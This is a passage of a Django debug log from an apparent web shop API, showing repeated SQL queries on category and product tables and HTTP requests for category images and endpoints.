"shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 02:37:35] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [20/Dec/2019 02:37:35] "GET /media/categories/2019/12/13/collection4.png HTTP/1.0" 200 432480 [20/Dec/2019 02:37:35] "GET /media/categories/2019/12/13/popular3.png HTTP/1.0" 200 309908 [20/Dec/2019 02:37:35] "GET /media/categories/2019/12/13/collection7_sU2pbFG.png HTTP/1.0" 200 379075 [20/Dec/2019 02:37:35] "GET /media/categories/2019/12/13/collection7_s1gVgUK.png HTTP/1.0" 200 379075 [20/Dec/2019 02:37:35] "GET /media/categories/2019/12/13/collection7_zgKzb94.png HTTP/1.0" 200 379075 [20/Dec/2019 02:37:35] "GET /media/categories/2019/12/13/collection7_ZCM4YHI.png HTTP/1.0" 200 379075 [20/Dec/2019 02:37:35] "GET /media/categories/2019/12/13/collection7.png HTTP/1.0" 200 379075 [20/Dec/2019 02:37:35] "GET /media/categories/2019/12/13/collection4_45IbUzs.png HTTP/1.0" 200 432480 [20/Dec/2019 02:37:36] "GET /media/categories/2019/12/13/collection4_klUHkrJ.png HTTP/1.0" 200 432480 [20/Dec/2019 02:37:36] "GET /media/categories/2019/12/13/collection4_wmrC3xY.png HTTP/1.0" 200 432480 [20/Dec/2019 02:37:36] "GET /media/categories/2019/12/13/collection4_ykrPiOh.png HTTP/1.0" 200 432480 [20/Dec/2019 02:37:36] "GET /media/categories/2019/12/13/collection8_98NdtQd.png HTTP/1.0" 200 376652 [20/Dec/2019 02:37:36] "GET /media/categories/2019/12/13/collection8_qT6o4Ze.png HTTP/1.0" 200 376652 [20/Dec/2019 02:37:36] "GET /media/categories/2019/12/13/collection8_MKX5n4Y.png HTTP/1.0" 200 376652 [20/Dec/2019 02:37:36] "GET /media/categories/2019/12/13/collection8.png HTTP/1.0" 200 376652 [20/Dec/2019 02:37:36] "GET /media/categories/2019/12/13/collection5_NjJaGxE.png HTTP/1.0" 200 454674 [20/Dec/2019 02:37:36] "GET /media/categories/2019/12/13/collection5_DOY3fSw.png HTTP/1.0" 200 454674 [20/Dec/2019 02:37:36] "GET /media/categories/2019/12/13/collection5_J2Tl3z7.png HTTP/1.0" 200 454674 [20/Dec/2019 02:37:36] "GET /media/categories/2019/12/13/collection5_VsJvXmq.png HTTP/1.0" 200 454674 [20/Dec/2019 02:37:36] "GET /media/categories/2019/12/13/collection5.png HTTP/1.0" 200 454674 [20/Dec/2019 02:37:36] "GET /media/categories/2019/12/13/weapons2.png HTTP/1.0" 200 523712 [20/Dec/2019 02:37:36] "GET /media/categories/2019/12/13/weapons1.png HTTP/1.0" 200 700594 [20/Dec/2019 02:37:37] "GET /media/categories/2019/12/13/collection9.png HTTP/1.0" 200 284188 [20/Dec/2019 02:37:37] "GET /media/categories/2019/12/13/collection9_y5Aperx.png HTTP/1.0" 200 284188 DEBUG 2019-12-20 02:37:40,599 utils 4252 140031503103744 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-20 02:37:40,604 utils 4252 140031503103744 (0.002) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [20/Dec/2019 02:37:40] "GET /api/v1/fire/ HTTP/1.0" 200 482 DEBUG 2019-12-20 02:37:44,607 utils 4252 140031503103744 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 02:37:44,618 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 02:37:44,624 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 02:37:44,628 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 02:37:44,634 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 02:37:44,638 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 02:37:44,641 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 02:37:44,645 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 02:37:44,649 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 02:37:44,655 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 02:37:44,659 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 02:37:44,663 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 02:37:44,667 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 02:37:44,671 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 02:37:44,677 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 02:37:44,681 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 02:37:44,685 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 02:37:44,689 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 02:37:44,691 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 02:37:44,695 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 02:37:44,697 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 02:37:44,699 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 02:37:44,701 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 02:37:44,704 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 02:37:44,706 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 02:37:44,709 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 02:37:44,711 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 02:37:44,713 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 02:37:44,716 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 02:37:44,718 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 02:37:44,721 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 02:37:44,723 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 02:37:44,725 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 02:37:44,727 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 02:37:44,730 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 02:37:44,733 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 02:37:44,735 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 02:37:44,737 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 02:37:44,739 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 02:37:44,742 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 02:37:44,744 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 02:37:44,746 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 02:37:44,749 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 02:37:44,751 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 02:37:44,753 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 02:37:44,756 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 02:37:44] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 02:37:46,901 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 02:37:46,908 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 02:37:46,912 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 02:37:46,914 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 02:37:46,917 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 02:37:46,919 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 02:37:46,921 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 02:37:46,924 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 02:37:46,926 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 02:37:46,929 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 02:37:46,931 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 02:37:46,934 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 02:37:46,936 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", 